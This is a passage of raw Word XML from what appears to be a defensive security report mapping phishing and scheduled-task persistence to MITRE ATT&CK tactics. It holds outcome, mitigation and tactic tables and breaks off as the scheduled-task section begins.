            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BBF30F7" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>User gives up email or VPN login info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="38117CFB" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547D95FC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Malware Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70EFBC23" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Victim unknowingly installs ransomware or RAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2F91AE5E" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F4832D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Business Email Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C590E97" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Used to trick others (e.g., finance team)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="20189944" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02DB1B34" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Data Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AAF3F35" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Phishing page collects usernames, passwords, session cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F311B7C" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Impact (If Not Caught):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F81CC5" w14:textId="77777777" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00041292" w:rsidP="00041292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Attackers gain fast access—can steal sensitive files, mess with business operations, or move deeper inside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A07069" w14:textId="279FA606" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation for Phishing</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9233" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="6398"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="74345F83" w14:textId="77777777" w:rsidTr="003F7A07">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06054623" w14:textId="70E868E5" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>e Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="136065F7" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Helps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6DBD14DA" w14:textId="77777777" w:rsidTr="003F7A07">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="184119EE" w14:textId="32AABA09" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Email Filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="148C8453" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Blocks known malicious attachments/links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4102C21D" w14:textId="77777777" w:rsidTr="003F7A07">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D5F1F3" w14:textId="2118D827" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>User Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FAFA967" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Helps employees spot fake emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="55C3389F" w14:textId="77777777" w:rsidTr="003F7A07">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DDA961" w14:textId="2F4C6DCB" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Disable Macros by Default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB7B5B8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="003F7A07">
            <w:pPr>
              <w:ind w:left="34"/>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Stops macro-based payloads from running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="3B70959F" w14:textId="77777777" w:rsidTr="003F7A07">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2790" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D60115D" w14:textId="5761C23E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Multi-Factor Authentication (MFA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29870251" w14:textId="0FFE326D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
            <w:r>
              <w:t xml:space="preserve">Required </w:t>
            </w:r>
            <w:r w:rsidRPr="00E817BE">
              <w:t>two-factor authentication for all key logins</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D60AEC" w:rsidRPr="00D60AEC">
              <w:t>Even if password is stolen, attacker can’t log in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6928D771" w14:textId="5C65AAA6" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="6295D01C" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="2A5C4F15" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="273CB24C" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00D60AEC" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="5EDDEC5B" w14:textId="050762F7" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linked MITRE Tactics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6"/>
        <w:gridCol w:w="1765"/>
        <w:gridCol w:w="3490"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="15AB3F8A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C144E4" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B7C8C89" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042835F9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Relates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="5A072C40" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65B15FCE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60B55766" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27E6BDAC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Email gives attacker first access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="1EE1254B" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60397900" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E3E878" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D59F38D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Malicious document executes code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="508CA011" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E606325" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12C8656D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE7B80D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Fake login page steals passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="45AA1E1F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE581BF" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28AF4080" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="664A263F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attacker gathers sensitive info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B05490F" w14:textId="076C5CAD" w:rsidR="00D60AEC" w:rsidRDefault="00501A9C" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D60AEC" w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echnique 3: Scheduled Task / Job (T1053)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A822A09" w14:textId="77777777" w:rsidR="003F7A07" w:rsidRPr="00E817BE" w:rsidRDefault="003F7A07" w:rsidP="003F7A07">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Attackers set up jobs on computers to make their malware or remote commands run again and again—even after reboot or detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D08484" w14:textId="41E9F87F" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique: Scheduled Task/Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E787B0B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> T1053</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F152C95" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Associated Tactics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C5D4B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473E82D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EEFB3" w14:textId="33DF9A94" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Defen</w:t>
      </w:r>
      <w:r w:rsidR="001D5AD4">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>e Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E687C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB61AC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183ECA72" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE92B6A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B335D97" w14:textId="47EEF1E2" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="7C9A731F" w14:textId="1CD5B7F9" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Is a Scheduled Task?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F6379" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Attackers use this technique to </w:t>
      </w:r>
